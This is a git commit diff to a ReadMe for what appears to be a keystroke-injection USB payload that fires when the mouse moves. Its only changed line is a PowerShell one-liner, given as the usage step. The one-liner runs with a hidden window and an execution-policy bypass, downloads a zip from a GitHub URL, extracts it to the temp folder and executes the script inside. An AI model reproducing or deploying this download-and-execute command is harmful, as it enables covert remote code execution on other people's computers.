Update ReadMe.md
This commit is contained in:
parent
94c63145d8
commit
aed71dbebd
1 changed files with 1 additions and 1 deletions
|
@ -45,7 +45,7 @@ when a mouse movement is detected
|
||||||
* Plug in your device
|
* Plug in your device
|
||||||
* Invoke-WebRequest will be entered in the Run Box to download and execute the dependencies and payload
|
* Invoke-WebRequest will be entered in the Run Box to download and execute the dependencies and payload
|
||||||
```
|
```
|
||||||
powershell -w h -NoP -NonI -Exec Bypass $U='https://github.com/I-Am-Jakoby/I-Am-Jakoby/raw/main/Assets/rr.zip';$Z="$env:TMP"+'\rr.zip';$D="$env:TMP"+'\rr';iwr -Uri $U -O $Z;Expand-Archive $Z -DestinationPath $D\ -Force;powershell $D\rr.ps1
|
powershell -w h -NoP -NonI -Ep Bypass $D="$env:tmp";iwr -Uri 'https://github.com/I-Am-Jakoby/I-Am-Jakoby/raw/main/Assets/rr.zip' -O "$D\rr.zip";Expand-Archive "$D\rr.zip" -Des $D\rr -Force;. "$D\rr\rr.ps1"
|
||||||
```
|
```
|
||||||
|
|
||||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||||
|
|
Loading…
Reference in a new issue